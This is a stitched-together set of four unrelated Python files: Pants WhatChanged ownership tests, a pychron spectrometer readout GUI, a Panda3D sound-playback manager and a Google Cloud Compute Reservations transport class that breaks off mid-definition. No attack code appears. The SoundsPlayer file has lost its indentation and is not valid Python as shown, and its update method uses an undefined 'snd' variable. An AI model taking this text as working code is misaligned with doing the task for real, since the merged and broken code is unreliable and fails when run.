class WhatChangedTest(WhatChangedTestBasic):
  """End-to-end checks that changed files map to the expected owning targets."""
  def test_owned(self):
    # Files under a target's sources map back to that target.
    self.assert_console_output(
      'root/src/py/a:alpha',
      'root/src/py/1:numeric',
      workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
    )
  def test_multiply_owned(self):
    # A file owned by two targets reports both.
    self.assert_console_output(
      'root/src/thrift:thrift',
      'root/src/thrift:py-thrift',
      workspace=self.workspace(files=['root/src/thrift/a.thrift'])
    )
  def test_build(self):
    # Touching a BUILD file reports every target it defines.
    self.assert_console_output(
      'root/src/py/a:alpha',
      'root/src/py/a:beta',
      workspace=self.workspace(files=['root/src/py/a/BUILD'])
    )
  def test_broken_build_file(self):
    # A syntactically broken BUILD file surfaces as AddressLookupError.
    with self.assertRaises(AddressLookupError):
      self.add_to_build_file('root/src/py/a', dedent("""
      //
      """))
      self.assert_console_output(workspace=self.workspace(files=['root/src/py/a/BUILD']))
  def test_resource_changed(self):
    # A changed resource file maps to the python_library that lists it.
    self.assert_console_output(
      'root/src/py/a:alpha',
      workspace=self.workspace(files=['root/src/py/a/test.resources'])
    )
  def test_resource_changed_for_java_lib(self):
    self.assert_console_output(
      'root/src/resources/a:a_resources',
      workspace=self.workspace(files=['root/src/resources/a/a.resources'])
    )
  def test_build_sibling(self):
    # Suffixed BUILD files (BUILD.twitter) are honored.
    self.assert_console_output(
      'root/3rdparty:dummy',
      workspace=self.workspace(files=['root/3rdparty/BUILD.twitter'])
    )
  def test_resource_type_error(self):
    # Non-string resources entries should raise rather than be ignored.
    self.add_to_build_file('root/src/resources/a1', dedent("""
      java_library(
        name='a1',
        sources=['a1.test'],
        resources=[1]
      )
    """))
    self.assert_console_raises(
      Exception,
      workspace=self.workspace(files=['root/src/resources/a1/a1.test'])
    )
  def test_build_directory(self):
    # This should ensure that a directory named the same as build files does not cause an exception.
    self.assert_console_output(
      'root/scripts:scripts',
      workspace=self.workspace(files=['root/scripts/a/build', 'root/scripts/a/build/scripts.java'])
    )
  def test_fast(self):
    # --fast should produce the same owners as the default path.
    self.assert_console_output(
      'root/src/py/a:alpha',
      'root/src/py/1:numeric',
      options={'fast': True},
      workspace=self.workspace(
        files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
      ),
    )
  def test_diffspec(self):
    # --diffspec routes through Workspace.changes_in instead of touched_files.
    self.assert_console_output(
      'root/src/py/a:alpha',
      'root/src/py/1:numeric',
      options={'diffspec': '42'},
      workspace=self.workspace(
        diffspec='42',
        diff_files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
      ),
    )
  def test_diffspec_removed_files(self):
    # A file deleted in the diff still maps to its (rglobs-owning) target.
    self.assert_console_output(
      'root/src/java/a:a_java',
      options={'diffspec': '42'},
      workspace=self.workspace(
        diffspec='42',
        diff_files=['root/src/java/a/b/c/Foo.java'],
      ),
    )
  def test_include_dependees(self):
    # none / direct / transitive dependee expansion over the a <- b <- c chain.
    self.assert_console_output(
      'root/src/py/dependency_tree/a:a',
      workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
    )
    self.assert_console_output(
      'root/src/py/dependency_tree/a:a',
      'root/src/py/dependency_tree/b:b',
      options={'include_dependees': 'direct'},
      workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
    )
    self.assert_console_output(
      'root/src/py/dependency_tree/a:a',
      'root/src/py/dependency_tree/b:b',
      'root/src/py/dependency_tree/c:c',
      options={'include_dependees': 'transitive'},
      workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
    )
  def test_exclude(self):
    # exclude_target_regexp filters targets out of the dependee expansion.
    self.assert_console_output(
      'root/src/py/dependency_tree/a:a',
      'root/src/py/dependency_tree/b:b',
      'root/src/py/dependency_tree/c:c',
      options={'include_dependees': 'transitive'},
      workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
    )
    self.assert_console_output(
      'root/src/py/dependency_tree/a:a',
      'root/src/py/dependency_tree/c:c',
      options={'include_dependees': 'transitive', 'exclude_target_regexp': [':b']},
      workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
    )
  def test_deferred_sources_new(self):
    # remote_sources / unpacked_jars targets are all owned by their BUILD file.
    self.add_to_build_file('root/proto', dedent("""
      remote_sources(name='unpacked_jars',
        dest=java_protobuf_library,
        sources_target=':external-source',
      )
      unpacked_jars(name='external-source',
        libraries=[':external-source-jars'],
        include_patterns=[
          'com/squareup/testing/**/*.proto',
        ],
      )
      jar_library(name='external-source-jars',
        jars=[
          jar(org='com.squareup.testing.protolib', name='protolib-external-test', rev='0.0.2'),
        ],
      )
    """))
    self.assert_console_output(
      'root/proto:unpacked_jars',
      'root/proto:external-source',
      'root/proto:external-source-jars',
      workspace=self.workspace(files=['root/proto/BUILD'])
    )
  def test_rglobs_in_sources(self):
    # rglobs matches files at any depth under the target directory.
    self.assert_console_output(
      'root/src/java/a:a_java',
      workspace=self.workspace(files=['root/src/java/a/foo.java'])
    )
    self.assert_console_output(
      'root/src/java/a:a_java',
      workspace=self.workspace(files=['root/src/java/a/b/foo.java'])
    )
  def test_globs_in_sources(self):
    # Flat globs matches only direct children, not nested files.
    self.assert_console_output(
      'root/src/java/b:b_java',
      workspace=self.workspace(files=['root/src/java/b/foo.java'])
    )
    self.assert_console_output(
      workspace=self.workspace(files=['root/src/java/b/b/foo.java'])
    )
  def test_globs_in_resources(self):
    self.add_to_build_file('root/resources', dedent("""
      resources(
        name='resources',
        sources=globs('*')
      )
    """))
    self.assert_console_output(
      workspace=self.workspace(files=['root/resources/foo/bar/baz.yml'])
    )
    self.assert_console_output(
      'root/resources:resources',
      workspace=self.workspace(files=['root/resources/baz.yml'])
    )
  def test_root_config(self):
    # pants.ini at the build root is owned by the //:pants-config target.
    self.assert_console_output(
      '//:pants-config',
      workspace=self.workspace(files=['pants.ini'])
    )
class WhatChangedTestWithIgnorePatterns(WhatChangedTestBasic):
  """WhatChanged should honor build_ignore_patterns when mapping files to targets."""
  @property
  def build_ignore_patterns(self):
    # BUILD files under this path are invisible to target resolution.
    return ['root/src/py/1']
  def test_build_ignore_patterns(self):
    # root/src/py/1/2 changed, but its owning BUILD file is ignored,
    # so only the alpha target is reported.
    self.assert_console_output(
      'root/src/py/a:alpha',
      workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
    )
|
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
# ============= standard library imports ========================
import time
import six.moves.configparser
# ============= enthought library imports =======================
from pyface.timer.do_later import do_after
from six.moves import zip
from traits.api import (
HasTraits,
Str,
List,
Any,
Event,
Button,
Int,
Bool,
Float,
Either,
)
from traitsui.api import UItem, VGroup, Item, HGroup, View, TableEditor, Tabbed
from traitsui.api import spring
from traitsui.handler import Handler
from traitsui.table_column import ObjectColumn
# ============= local library imports ==========================
from pychron.core.yaml import yload
from pychron.paths import paths
from pychron.persistence_loggable import PersistenceLoggable
from pychron.pychron_constants import NULL_STR
# Fallback content written to readout.yaml by _write_default when no readout
# configuration exists: a two-item YAML list — the first item describes general
# readouts (with min/max ranges), the second describes deflection readouts.
DEFAULT_CONFIG = """-
- name: HighVoltage
min: 0
max: 5
compare: False
- name: ElectronEnergy
min: 53
max: 153
compare: False
- name: YSymmetry
min: -100
max: 100
compare: True
- name: ZSymmetry
min: -100
max: 100
compare: True
- name: ZFocus
min: 0
max: 100
compare: True
- name: IonRepeller
min: -22.5
max: 53.4
compare: True
- name: ExtractionLens
min: 0
max: 100
compare: True
-
- name: H2
compare: True
- name: H1
compare: True
- name: AX
compare: True
- name: L1
compare: True
- name: L2
compare: True
- name: CDD
compare: True
"""
class BaseReadout(HasTraits):
    """Base class for a single spectrometer readout value.

    Holds the current hardware ``value`` alongside the expected
    ``config_value`` and the tolerance settings used to flag mismatches.
    """
    name = Str
    id = Str
    # Current hardware value; may be a string placeholder (e.g. NULL_STR)
    # when the value is unavailable, hence Either(Str, Float).
    value = Either(Str, Float)
    spectrometer = Any
    # Whether this readout participates in polling/configuration comparison.
    compare = Bool(True)
    config_value = Float
    tolerance = Float
    percent_tol = Float
    display_tolerance = Str
    # use_word = Bool(True)

    @property
    def dev(self):
        """Deviation of the current value from the configured value,
        or NULL_STR when the current value is not numeric."""
        try:
            return self.value - self.config_value
        except (TypeError, ValueError):
            # TypeError: value may be a str placeholder (Either(Str, Float));
            # catching only ValueError would let it propagate.
            return NULL_STR

    @property
    def percent_dev(self):
        """Absolute deviation as a percentage of the configured value,
        or NULL_STR when it cannot be computed."""
        try:
            return abs(self.dev / self.config_value * 100)
        except (TypeError, ZeroDivisionError):
            # TypeError: dev is NULL_STR when value is non-numeric.
            return NULL_STR

    def set_value(self, v):
        """Store ``v`` as a float when possible, otherwise as-is (if not None)."""
        try:
            self.value = float(v)
        except (AttributeError, ValueError, TypeError):
            if v is not None:
                self.value = v

    def config_compare(self):
        """Compare ``value`` against ``config_value``.

        Uses ``percent_tol`` (relative) when set, else the absolute
        ``tolerance``. Returns (name, value, config_value) on a mismatch,
        otherwise None. Also refreshes ``display_tolerance``.
        """
        tolerance = self.percent_tol
        if tolerance:
            try:
                self.display_tolerance = "{:0.2f}%".format(tolerance * 100)
                try:
                    if (
                        abs(self.value - self.config_value) / self.config_value
                        > tolerance
                    ):
                        return self.name, self.value, self.config_value
                except TypeError:
                    # value is non-numeric; nothing to compare
                    pass
            except ZeroDivisionError:
                # config_value == 0; relative comparison undefined
                pass
        else:
            try:
                self.display_tolerance = "{:0.2f}".format(self.tolerance)
                if abs(self.value - self.config_value) > self.tolerance:
                    return self.name, self.value, self.config_value
            except TypeError:
                pass

    def compare_message(self):
        """Human-readable description of a configuration mismatch."""
        return "{} does not match. Current:{:0.3f}, Config: {:0.3f}, tol.: {}".format(
            self.name, self.value, self.config_value, self.display_tolerance
        )
class Readout(BaseReadout):
    """A readout value that is polled individually from the spectrometer."""
    min_value = Float(0)
    max_value = Float(100)
    tolerance = Float(0.01)
    # Minimum seconds between hardware queries for this readout.
    query_timeout = 3
    _last_query = 0

    def traits_view(self):
        return View(HGroup(Item("value", style="readonly", label=self.name)))

    def query_value(self):
        """Poll the hardware for a fresh value, rate-limited by query_timeout."""
        if not (self.compare and self.query_needed):
            return
        parameter = self.spectrometer.get_hardware_name(self.id)
        if not parameter:
            return
        self.set_value(self.spectrometer.get_parameter(parameter))
        self._last_query = time.time()

    def get_percent_value(self):
        """Return value's position within [min_value, max_value] as a fraction."""
        try:
            span = self.max_value - self.min_value
            return (self.value - self.min_value) / span
        except (TypeError, ZeroDivisionError, ValueError):
            return 0

    @property
    def query_needed(self):
        # Never queried yet, or the rate-limit window has elapsed.
        last = self._last_query
        return not last or (time.time() - last) > self.query_timeout
class DeflectionReadout(BaseReadout):
    # Deflection values are fetched in bulk via read_deflection_word (see
    # ReadoutView._refresh), so no per-readout polling behavior is needed.
    pass
class ReadoutHandler(Handler):
    """Stops the readout polling loop when its window is closed."""
    def closed(self, info, is_ok):
        info.object.stop()
class ReadoutView(PersistenceLoggable):
    """Periodically polls spectrometer readouts and deflections, displays them
    in tables, and optionally compares them against configuration values,
    offering to push the configuration to the hardware on a mismatch.
    """
    # general readouts (source/lens parameters), polled individually
    readouts = List(Readout)
    # deflection readouts, read in bulk via read_deflection_word
    deflections = List(DeflectionReadout)
    spectrometer = Any
    refresh = Button
    refresh_needed = Event
    refresh_period = Int(10, enter_set=True, auto_set=False) # seconds
    compare_to_config_enabled = Bool(True)
    _alive = False
    # attributes persisted across sessions by PersistenceLoggable
    pattributes = ("compare_to_config_enabled", "refresh_period")
    persistence_name = "readout"
    def __init__(self, *args, **kw):
        super(ReadoutView, self).__init__(*args, **kw)
        # restore persisted attributes (persistence mixin load)
        self.load()
        self._load_configuration()
    def _load_configuration(self):
        # Prefer readout.yaml; fall back to the legacy readout.cfg; otherwise
        # offer to write (and then load) a default yaml file.
        ypath = os.path.join(paths.spectrometer_dir, "readout.yaml")
        if not os.path.isfile(ypath):
            path = os.path.join(paths.spectrometer_dir, "readout.cfg")
            if os.path.isfile(path):
                self._load_cfg(path)
            else:
                if self.confirmation_dialog(
                    "no readout configuration file. \n"
                    "Would you like to write a default file at {}".format(ypath)
                ):
                    self._write_default(ypath)
                    self._load_yaml(ypath)
        else:
            self._load_yaml(ypath)
    def _load_cfg(self, path):
        """Load the deprecated ini-style configuration (one readout per section)."""
        self.warning_dialog(
            "Using readout.cfg is deprecated. Please consider migrating to readout.yaml"
        )
        config = six.moves.configparser.ConfigParser()
        config.read(path)
        for section in config.sections():
            rd = Readout(name=section, spectrometer=self.spectrometer)
            self.readouts.append(rd)
    def _load_yaml(self, path):
        """Load readout.yaml: a two-item list (readouts, deflections);
        a single list is treated as readouts only."""
        yt = yload(path)
        if yt:
            try:
                yl, yd = yt
            except ValueError:
                # single-document file: general readouts only
                yl = yt
                yd = []
            for rd in yl:
                # NOTE(review): Readout does not declare a 'hardware_name'
                # trait in this file — presumably added dynamically by
                # HasTraits; confirm.
                rr = Readout(
                    spectrometer=self.spectrometer,
                    name=rd["name"],
                    id=rd.get("id", rd["name"]),
                    hardware_name=rd.get("hardware_name"),
                    min_value=rd.get("min", 0),
                    max_value=rd.get("max", 1),
                    tolerance=rd.get("tolerance", 0.01),
                    percent_tol=rd.get("percent_tolerance", 0.0),
                    compare=rd.get("compare", True),
                    query_timeout=self.refresh_period,
                )
                self.readouts.append(rr)
            for rd in yd:
                rr = DeflectionReadout(
                    spectrometer=self.spectrometer,
                    name=rd["name"],
                    id=rd.get("id", rd["name"]),
                    tolerance=rd.get("tolerance", 1),
                    compare=rd.get("compare", True),
                )
                self.deflections.append(rr)
    def _write_default(self, ypath):
        # Write the module-level DEFAULT_CONFIG template verbatim.
        with open(ypath, "w") as wfile:
            wfile.write(DEFAULT_CONFIG)
    @property
    def ms_period(self):
        # refresh period in milliseconds, as expected by do_after
        return self.refresh_period * 1000
    def start(self):
        """Start the periodic refresh loop (idempotent)."""
        if not self._alive:
            self._alive = True
            self._refresh_loop()
    def stop(self):
        """Stop the refresh loop; the pending do_after callback exits quietly."""
        self._alive = False
    def _refresh_loop(self):
        self._refresh()
        # reschedule ourselves until stop() clears the flag
        if self._alive:
            do_after(self.ms_period, self._refresh_loop)
    def _refresh_fired(self):
        # manual refresh button
        self._refresh()
    def _refresh_period_changed(self):
        # keep each readout's rate limit in sync with the view's period
        for r in self.readouts:
            r.query_timeout = self.refresh_period
    def _refresh(self):
        """Poll hardware, update the tables, and compare against configuration."""
        spec = self.spectrometer
        # deflections are read in one bulk word for the compared channels
        deflections = [r for r in self.deflections if r.compare]
        keys = [r.name for r in deflections]
        if keys:
            ds = spec.read_deflection_word(keys)
            for d, r in zip(ds, deflections):
                r.set_value(d)
        # poll individual readouts, but stay within ~one refresh period
        st = time.time()
        timeout = self.refresh_period * 0.95
        for rd in self.readouts:
            if time.time() - st > timeout:
                break
            rd.query_value()
        self.refresh_needed = True
        # compare to configuration values
        ne = []
        nd = []
        if not spec.simulation and self.compare_to_config_enabled:
            for nn, rs in ((ne, self.readouts), (nd, self.deflections)):
                for r in rs:
                    cv = spec.get_configuration_value(r.id)
                    r.config_value = cv
                    if r.compare:
                        args = r.config_compare()
                        if args:
                            nn.append(args)
                            self.debug(r.compare_message())
                    else:
                        # non-compared readouts show a placeholder value
                        r.set_value(NULL_STR)
        ns = ""
        if ne:
            ns = "\n".join(["{:<16s}\t{:0.3f}\t{:0.3f}".format(*n) for n in ne])
        if nd:
            nnn = "\n".join(["{:<16s}\t\t{:0.0f}\t{:0.0f}".format(*n) for n in nd])
            ns = "{}\n{}".format(ns, nnn)
        if ns:
            # Offer to push the configured values down to the hardware.
            msg = (
                "There is a mismatch between the current spectrometer values and the configuration.\n"
                "Would you like to set the spectrometer to the configuration values?\n\n"
                "Name\t\tCurrent\tConfig\n{}".format(ns)
            )
            if self.confirmation_dialog(msg, size=(725, 300)):
                spec.send_configuration()
                spec.set_debug_configuration_values()
    def traits_view(self):
        """Tabbed General/Deflections tables plus the compare/refresh controls."""
        def ff(x):
            # format floats to 3 decimals; pass string placeholders through
            return "{:0.3f}".format(x) if isinstance(x, float) else x
        cols = [
            ObjectColumn(name="name", label="Name"),
            ObjectColumn(name="value", format_func=ff, label="Value", width=50),
            ObjectColumn(
                name="config_value", format="%0.3f", label="Config. Value", width=50
            ),
            ObjectColumn(name="dev", format_func=ff, label="Dev.", width=50),
            ObjectColumn(name="percent_dev", format_func=ff, label="%Dev.", width=50),
            ObjectColumn(name="display_tolerance", label="Tol."),
        ]
        dcols = [
            ObjectColumn(name="name", label="Name", width=100),
            ObjectColumn(name="value", format_func=ff, label="Value", width=100),
            ObjectColumn(name="dev", format_func=ff, label="Dev."),
            ObjectColumn(name="percent_dev", format_func=ff, label="%Dev."),
            ObjectColumn(name="display_tolerance", label="Tol."),
        ]
        b = VGroup(
            UItem("readouts", editor=TableEditor(columns=cols, editable=False)),
            label="General",
        )
        c = VGroup(
            UItem(
                "deflections",
                editor=TableEditor(columns=dcols, sortable=False, editable=False),
            ),
            label="Deflections",
        )
        v = View(
            VGroup(
                Tabbed(b, c),
                HGroup(
                    Item(
                        "compare_to_config_enabled",
                        label="Comp. Config",
                        tooltip="If checked, compare the current values to the values in the "
                        "configuration file. "
                        "Warn user if there is a mismatch",
                    ),
                    spring,
                    Item("refresh", show_label=False),
                ),
            )
        )
        return v
def new_readout_view(rv):
    """Start polling on ``rv`` and return a standalone readout window View."""
    rv.start()
    from pychron.processing.analyses.view.magnitude_editor import MagnitudeColumn

    def _fmt(value):
        # 3-decimal formatting for floats; string placeholders pass through
        return "{:0.3f}".format(value) if isinstance(value, float) else value

    general_cols = [
        ObjectColumn(name="name", label="Name"),
        ObjectColumn(
            name="value",
            format_func=_fmt,
            label="Value",
        ),
        MagnitudeColumn(name="value", label="", width=200),
    ]
    deflection_cols = [
        ObjectColumn(name="name", label="Name", width=100),
        ObjectColumn(name="value", label="Value", width=100),
    ]
    period_grp = HGroup(Item("refresh_period", label="Period (s)"))
    general_grp = VGroup(
        UItem("readouts", editor=TableEditor(columns=general_cols, editable=False)),
        label="General",
    )
    deflection_grp = VGroup(
        UItem(
            "deflections",
            editor=TableEditor(columns=deflection_cols, sortable=False, editable=False),
        ),
        label="Deflections",
    )
    return View(
        VGroup(period_grp, Tabbed(general_grp, deflection_grp)),
        handler=ReadoutHandler(),
        title="Spectrometer Readout",
        width=500,
        resizable=True,
    )
# ============= EOF =============================================
|
|
'''
Copyright (c) 2008 Georgios Giannoudovardis, <vardis.g@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import logging
import math
from direct.showbase import Audio3DManager
from pandac.PandaModules import NodePath
from pano.constants import PanoConstants
from pano.util import PandaUtil
from pano.model.Sound import Sound
from pano.audio.SoundPlaybackInterface import SoundPlaybackInterface
class SoundsPlayer():
"""
Manages playback and the lifetime of sounds.
Generally you can provide either filenames of .snd files or raw music files
such as .mp3, .ogg. Use the high level .snd files if you want to provide
further information such as 3d position, subtitles, etc.
For efficiency reasons, there is a limit to the number of concurrent active
sounds and thus it is important to release sound resources when they are
no longer needed. But since garbage collection is not deterministic, you
must call sound.dispose() when you have no more need of the sound object.
"""
def __init__(self, game):
self.log = logging.getLogger('pano.soundsPlayer')
self.game = game
self.audio3d = None # manager of positional sounds
self.sounds = [] # list of references to sound objects
self.unfinishedSounds = [] # list of strong references to sounds still playing
self.volume = 1.0 # default volume level
self.rate = 1.0 # default rate of playback
self.balance = 0.0 # default balance, -1.0: left, 0.0: center, 1.0: right
self.enabled = True # indicates if sounds are enabled in a global scale
# the following are valid only for positional sounds
self.dropOffFactor = 1.0 # the rate that sounds attenuate by distance
self.distanceFactor = 1.0 # the scale of measuring units, the default is a scale of 1.0 to match units with meters
self.dopplerFactor = 1.0 # the Doppler factor
def initialize(self):
self.audio3d = Audio3DManager.Audio3DManager(base.sfxManagerList[0], self.game.getView().getCamera())
def update(self, millis):
# drop finished sounds
prevLen = len(self.sounds)
self.sounds = [snd for snd in self.sounds if not snd.isFinished()]
rem = prevLen - len(self.sounds)
if rem > 0:
self.log.debug('Removed %d finished sounds' % rem)
positionalSounds = [snd for snd in self.sounds if snd.positional != Sound.POS_None]
for sp in positionalSounds:
if sp.positional == Sound.POS_Hotspot:
hp = self.game.getView().activeNode.hotspots.get(sp.node)
if hp is not None:
hpos = self.game.getView().panoRenderer.getHotspotWorldPos(hp)
np = NodePath('audio3d_' + sp.name)
np.setPos(hpos[0], hpos[1], hpos[2])
self.audio3d.attachSoundToObject(sp, np)
else:
self.log.error('Could not find hotspot %s to attach positional sound %s' % (sp.node, sp.name))
elif snd.positionalType == Sound.POS_Node:
np = PandaUtil.findSceneNode(sp.node)
if np is not None:
self.audio3d.attachSoundToObject(sp.pandaSound, np)
else:
self.log.error('Could not find node %s to attach positional sound %s' % (snd.pos, snd.name))
if self.audio3d is not None:
self.audio3d.setDropOffFactor(self.dropOffFactor)
self.audio3d.setDistanceFactor(self.distanceFactor)
self.audio3d.setDopplerFactor(self.dopplerFactor)
def playSound(self, sndName, loop=None, rate=None):
"""
Plays the sound that is described by the specified sound resource
whose properties are defined in the file sndName + '.snd'.
Returns: a Sound object or None if playback failed
"""
if self.enabled:
snd = self.game.getResources().loadSound(sndName)
loopVal = loop if loop is not None else snd.loop
rateVal = rate if rate is not None else snd.playRate
if rateVal is None:
rateVal = self.rate
is3D = snd.positional != Sound.POS_None
spi = self.playSoundFile(snd.soundFile, loopVal, rateVal, is3D)
spi.configureFilters(snd.getActiveFilters())
# 3d sounds with an absolute position can be specified here just once
# for other positional types we specify them in the update method
if is3D and snd.positional == Sound.POS_Absolute:
np = NodePath('audio3d_' + snd.name)
np.setPos(snd.node[0], snd.node[1], snd.node[2])
self.audio3d.attachSoundToObject(snd, np)
return spi
def playSoundFile(self, filename, loop=False, rate=1.0, is3D = False):
"""
Plays the specified sound file with the defaul settings.
Returns: a Sound object or None if playback failed
"""
if self.enabled:
fp = self.game.getResources().getResourceFullPath(PanoConstants.RES_TYPE_SFX, filename)
try:
if is3D:
sound = self.audio3d.loadSfx(fp)
else:
sound = loader.loadSfx(fp)
except Exception:
self.log.exception('An error occured while attempting to load sound %s' % filename)
return None
spi = SoundPlaybackInterface(sound, is3D)
spi.setLoop(loop)
spi.setPlayRate(rate)
spi.setVolume(self.volume)
spi.setBalance(self.balance)
spi.play()
self.sounds.append(spi)
return spi
def stopAll(self):
"""
Stops all currently playing or paused sounds.
"""
for spi in self.sounds:
spi.stop()
def pauseAll(self):
"""
Pauses all currently playing sounds.
"""
for spi in self.sounds:
spi.pause()
def resumeAll(self):
"""
Resumes all currently paused sounds.
"""
for spi in self.sounds:
spi.play()
    def isSoundPlaying(self, sndName):
        """
        Returns True if the sound described by the specified sound resource
        is being played.

        NOTE(review): not implemented — always returns None (falsy), so
        callers cannot distinguish "not playing" from "unsupported".
        self.sounds holds SoundPlaybackInterface objects without the
        resource name, so a name lookup would need extra bookkeeping.
        """
        pass
def setVolume(self, volume):
"""
Sets the global volume level.
Individual sounds can playback at a different volume level.
"""
if volume < 0.0:
volume = 0.0
elif volume > 1.0:
volume = 1.0
self.volume = volume
def getVolume(self):
"""
Returns the global volume level.
"""
return self.volume
def getPlayRate(self):
'''
Returns the currently default rate of playback.
'''
return self.rate
def setPlayRate(self, value):
'''
Sets the currently default rate of playback.
'''
self.rate = value
def getBalance(self):
'''
Returns the currently default sound balance.
'''
return self.balance
def setBalance(self, value):
'''
Changes the balance of a sound. The range is between -1.0 to 1.0. Hard left is -1.0 and hard right is 1.0.
'''
if value < -1.0:
value = -1.0
elif value > 1.0:
value = 1.0
self.balance = value
def enableSounds(self):
'''
Enables playback of sounds. Sounds are enabled by default.
'''
self.enabled = True
base.enableSoundEffects(True)
def disableSounds(self):
'''
Disables sounds playback.
'''
self.enabled = False
base.enableSoundEffects(False)
def isEnabled(self):
'''
@return: True if sounds are enabled and False if otherwise.
'''
return self.enabled
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.compute_v1.types import compute
# Report the installed google-cloud-compute version in the user-agent; fall
# back to a blank ClientInfo when the distribution metadata is unavailable
# (e.g. running from a source checkout that was never pip-installed).
try:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
    )
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class ReservationsTransport(abc.ABC):
    """Abstract transport class for Reservations.

    Concrete transports (e.g. gRPC or REST) subclass this and implement the
    RPC properties below; this base class only resolves credentials and
    wraps the RPC callables with retry/timeout/client-info metadata.
    """
    # OAuth scopes requested when the caller supplies none.
    AUTH_SCOPES = (
        "https://www.googleapis.com/auth/compute",
        "https://www.googleapis.com/auth/cloud-platform",
    )
    DEFAULT_HOST: str = "compute.googleapis.com"
    def __init__(
        self,
        *,
        host: str = DEFAULT_HOST,
        credentials: Optional[ga_credentials.Credentials] = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
        **kwargs,
    ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): A list of scopes.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.
        """
        # Save the hostname. Default to port 443 (HTTPS) if none is specified.
        if ":" not in host:
            host += ":443"
        self._host = host
        scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
        # Save the scopes.
        self._scopes = scopes
        # If no credentials are provided, then determine the appropriate
        # defaults.
        # Order matters below: an explicit credentials object wins, then a
        # credentials file, then Application Default Credentials.
        if credentials and credentials_file:
            raise core_exceptions.DuplicateCredentialArgs(
                "'credentials_file' and 'credentials' are mutually exclusive"
            )
        if credentials_file is not None:
            credentials, _ = google.auth.load_credentials_from_file(
                credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
            )
        elif credentials is None:
            credentials, _ = google.auth.default(
                **scopes_kwargs, quota_project_id=quota_project_id
            )
        # If the credentials are service account credentials, then always try to use self signed JWT.
        # (hasattr guards against older google-auth versions lacking the API.)
        if (
            always_use_jwt_access
            and isinstance(credentials, service_account.Credentials)
            and hasattr(service_account.Credentials, "with_always_use_jwt_access")
        ):
            credentials = credentials.with_always_use_jwt_access(True)
        # Save the credentials.
        self._credentials = credentials
    def _prep_wrapped_messages(self, client_info):
        # Precompute the wrapped methods.
        # Each RPC property is wrapped once with the shared client_info so
        # user-agent metadata is attached to every call.
        self._wrapped_methods = {
            self.aggregated_list: gapic_v1.method.wrap_method(
                self.aggregated_list, default_timeout=None, client_info=client_info,
            ),
            self.delete: gapic_v1.method.wrap_method(
                self.delete, default_timeout=None, client_info=client_info,
            ),
            self.get: gapic_v1.method.wrap_method(
                self.get, default_timeout=None, client_info=client_info,
            ),
